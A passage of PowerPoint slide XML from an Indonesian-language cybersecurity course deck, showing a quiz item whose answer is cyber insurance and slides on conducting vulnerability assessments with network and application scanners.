              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. This type of protection can provide financial protection in case of a security breach resulting from a vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terjemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cybersecurity Insurance (Cyber Insurance).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cyber insurance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>timbul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>forensik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebocoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86739551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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meringkas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencarian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasilnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>positif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
